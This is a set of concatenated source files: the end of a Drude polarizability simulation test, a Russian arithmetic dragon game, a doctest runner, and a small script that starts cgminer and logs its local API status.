        system.bonded_inter.add(harmonic_bond)

        # Attach a Drude particle (odd ids 1,3,5,7) to each fixed core
        # (even ids 0,2,4,6); charges are derived from the polarizabilities.
        drude_helpers.add_drude_particle_to_core(
            system, harmonic_bond, thermalized_dist_bond, system.part[0], 1,
            types["PF6_D"], polarizations["PF6"], mass_drude,
            coulomb_prefactor, 2.0)
        drude_helpers.add_drude_particle_to_core(
            system, harmonic_bond, thermalized_dist_bond, system.part[2], 3,
            types["BMIM_C1_D"], polarizations["BMIM_C1"], mass_drude,
            coulomb_prefactor, 2.0)
        drude_helpers.add_drude_particle_to_core(
            system, harmonic_bond, thermalized_dist_bond, system.part[4], 5,
            types["BMIM_C2_D"], polarizations["BMIM_C2"], mass_drude,
            coulomb_prefactor, 2.0)
        drude_helpers.add_drude_particle_to_core(
            system, harmonic_bond, thermalized_dist_bond, system.part[6], 7,
            types["BMIM_C3_D"], polarizations["BMIM_C3"], mass_drude,
            coulomb_prefactor, 2.0)

        #Setup and add Drude-Core SR exclusion bonds
        drude_helpers.setup_and_add_drude_exclusion_bonds(system)

        #Setup intramol SR exclusion bonds once
        drude_helpers.setup_intramol_exclusion_bonds(
            system, [6, 7, 8], [1, 2, 3],
            [charges["BMIM_C1"], charges["BMIM_C2"], charges["BMIM_C3"]])

        #Add bonds per molecule
        drude_helpers.add_intramol_exclusion_bonds(
            system, [3, 5, 7], [2, 4, 6])

        #Thole
        drude_helpers.add_all_thole(system)

        def dipole_moment(id_core, id_drude):
            # induced dipole of one core/Drude pair: q_drude * (r_d - r_c)
            pc = system.part[id_core]
            pd = system.part[id_drude]
            v = pd.pos - pc.pos
            return pd.q * v

        def measure_dipole_moments():
            # equilibrate, then average the dipoles over 100 single steps;
            # returns per-site means plus the summed BMIM dipole
            dm_pf6 = []
            dm_C1 = []
            dm_C2 = []
            dm_C3 = []

            system.integrator.run(115)

            for i in range(100):
                system.integrator.run(1)
                dm_pf6.append(dipole_moment(0, 1))
                dm_C1.append(dipole_moment(2, 3))
                dm_C2.append(dipole_moment(4, 5))
                dm_C3.append(dipole_moment(6, 7))

            dm_pf6_m = np.mean(dm_pf6, axis=0)
            dm_C1_m = np.mean(dm_C1, axis=0)
            dm_C2_m = np.mean(dm_C2, axis=0)
            dm_C3_m = np.mean(dm_C3, axis=0)
            dm_sum_bmim = dm_C1_m + dm_C2_m + dm_C3_m
            res = dm_pf6_m, dm_C1_m, dm_C2_m, dm_C3_m, dm_sum_bmim
            return res

        def setElectricField(E):
            # apply a homogeneous field as per-particle external force q*E
            E = np.array(E)
            for p in system.part:
                p.ext_force = p.q * E

        def calc_pol(mu0, muE, E):
            # polarizability from the field-induced dipole change,
            # converted to CGS Angstrom^3
            pol = (muE - mu0) / E / conv_pol_CGS_SI
            return pol

        def measure_pol(Es, dim):
            # field of magnitude Es along axis `dim`; returns the PF6 and
            # BMIM polarizability diagonals for that axis
            E = [0.0, 0.0, 0.0]
            E[dim] = Es
            setElectricField(E)
            mux_pf6, mux_c1, mux_c2, mux_c3, mux_bmim = \
                measure_dipole_moments()
            return calc_pol(mu0_pf6[dim], mux_pf6[dim], Es), \
                calc_pol(mu0_bmim[dim], mux_bmim[dim], Es)

        # zero-field dipole moments
        mu0_pf6, mu0_c1, mu0_c2, mu0_c3, mu0_bmim = measure_dipole_moments()

        eA_to_Debye = 4.8032047
        atol = 1e-2
        rtol = 1e-2

        np.testing.assert_allclose(
            ref_mu0_pf6, eA_to_Debye * mu0_pf6, atol=atol, rtol=rtol)
        np.testing.assert_allclose(
            ref_mu0_c1, eA_to_Debye * mu0_c1, atol=atol, rtol=rtol)
        np.testing.assert_allclose(
            ref_mu0_c2, eA_to_Debye * mu0_c2, atol=atol, rtol=rtol)
        np.testing.assert_allclose(
            ref_mu0_c3, eA_to_Debye * mu0_c3, atol=atol, rtol=rtol)
        np.testing.assert_allclose(
            ref_mu0_bmim, eA_to_Debye * mu0_bmim, atol=atol, rtol=rtol)

        pol_pf6 = []
        pol_bmim = []

        # = 1 V/A in kJ / (Avogadro Number) / Angstrom / elementary charge
        Efield = 96.48536
        res = measure_pol(Efield, 0)
        pol_pf6.append(res[0])
        pol_bmim.append(res[1])
        res = measure_pol(Efield, 1)
        pol_pf6.append(res[0])
        pol_bmim.append(res[1])
        res = measure_pol(Efield, 2)
        pol_pf6.append(res[0])
        pol_bmim.append(res[1])

        np.testing.assert_allclose(
            ref_pol_pf6, pol_pf6, atol=atol, rtol=rtol)
        np.testing.assert_allclose(
            ref_pol_bmim, pol_bmim, atol=atol, rtol=rtol)


if __name__ == "__main__":
    ut.main()
mipt-cs-on-python3/arithmetic_dragons
tournament.py
# coding: utf-8
# license: GPLv3

from enemies import *
from hero import *


def annoying_input_int(message=''):
    """Prompt with *message* until the user types a valid integer.

    Prints a warning and re-asks on any non-integer input; returns the
    parsed value.
    """
    answer = None
    # fix: identity comparison with None ('is None'), not '== None'
    while answer is None:
        try:
            answer = int(input(message))
        except ValueError:
            print('Вы ввели недопустимые символы')
    return answer


def game_tournament(hero, dragon_list):
    """Run the question/answer duel between *hero* and each dragon in turn.

    A correct answer lets the hero strike the dragon; a wrong one lets the
    dragon strike back.  The tournament ends early if the hero dies.
    """
    for dragon in dragon_list:
        print('Вышел', dragon._color, 'дракон!')

        while dragon.is_alive() and hero.is_alive():
            print('Вопрос:', dragon.question())
            answer = annoying_input_int('Ответ:')

            if dragon.check_answer(answer):
                hero.attack(dragon)
                print('Верно! \n** дракон кричит от боли **')
            else:
                dragon.attack(hero)
                print('Ошибка! \n** вам нанесён удар... **')

        # the dragon survived, so the hero must have fallen: stop the run
        if dragon.is_alive():
            break

        print('Дракон', dragon._color, 'повержен!\n')

    if hero.is_alive():
        print('Поздравляем! Вы победили!')
        print('Ваш накопленный опыт:', hero._experience)
    else:
        print('К сожалению, Вы проиграли...')


def start_game():
    """Entry point: greet the player, build the dragons and run the game."""
    try:
        print('Добро пожаловать в арифметико-ролевую игру с драконами!')
        print('Представьтесь, пожалуйста: ', end='')
        hero = Hero(input())

        dragon_number = 3
        dragon_list = generate_dragon_list(dragon_number)
        # consistency fix: check against dragon_number instead of a second
        # hard-coded 3, so changing the count cannot silently break this
        assert(len(dragon_list) == dragon_number)

        print('У Вас на пути', dragon_number, 'драконов!')
        game_tournament(hero, dragon_list)
    except EOFError:
        print('Поток ввода закончился. Извините, принимать ответы более невозможно.')
spikeekips/source-over-ssh
src/tests/__init__.py
# -*- coding: utf-8 -*- __all__ = [ "test_config_db", "test_grid", "test_shell", "test_svn", ] if __name__ == "__main__" : import doctest for i in __all__ : print ("%%-%ds: %%s" % (max(map(len, __all__)) + 1)) % ( i, doctest.testmod(__import__(i, None, None, [i, ], ), ), )
cecilulysess/MinerLite
main.py
#!/usr/bin/python
# MinerLite - A client side miner controller.
# This will launch cgminer with a few delay seconds and
# retrieve the local data and post it into somewhere!
#
# Author: Yanxiang Wu
# Release Under GPL 3
# Used code from cgminer python API example

import socket
import json
import sys
import subprocess
import time
import os

# location of the cgminer binary and of the status log this script appends to
path = "/home/ltcminer/mining/cgminer/cgminer"
log_file = "/home/ltcminer/mining/minerlite.log"


def linesplit(socket):
    """Read from *socket* until the peer stops sending (empty recv).

    Returns the accumulated buffer, or None if nothing was received.
    Note: the parameter deliberately keeps its historical name even though
    it shadows the ``socket`` module inside this function.
    """
    buffer = socket.recv(4096)
    done = False
    while not done:
        more = socket.recv(4096)
        if not more:
            done = True
        else:
            buffer = buffer + more
    if buffer:
        return buffer


def retrieve_cgminer_info(command, parameter):
    """Query the local cgminer JSON API and return the raw response string.

    Sends *command* (with *parameter* attached when one is given) to the
    cgminer API listener on 127.0.0.1:4028.
    """
    api_ip = '127.0.0.1'
    api_port = 4028
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((api_ip, int(api_port)))
    # BUG FIX: the original condition was inverted ("if not parameter") --
    # it attached "parameter" only when none was supplied and dropped it
    # otherwise.  Attach the parameter exactly when one is given.
    if parameter:
        s.send(json.dumps({"command": command, "parameter": parameter}))
    else:
        s.send(json.dumps({"command": command}))
    response = linesplit(s)
    response = response.replace('\x00', '')
    return_val = response
    response = json.loads(response)
    # print response
    s.close()
    return return_val


def run_cgminer(path):
    """Launch cgminer with its JSON API listener enabled (non-blocking)."""
    subprocess.Popen([path, "--api-listen"])


# Script body guarded so importing this module has no side effects;
# behaviour when run as a script is unchanged.
if __name__ == "__main__":
    print("Starting cgminer in 2 seconds")
    time.sleep(2)
    print("Running cgminer ...")
    run_cgminer(path)
    # give cgminer time to bring up its API listener before querying it
    time.sleep(15)

    with open(log_file, 'a') as logfile:
        try:
            logfile.write(retrieve_cgminer_info("devs", None))
        except socket.error:
            # best-effort logging: cgminer API may not be reachable yet
            pass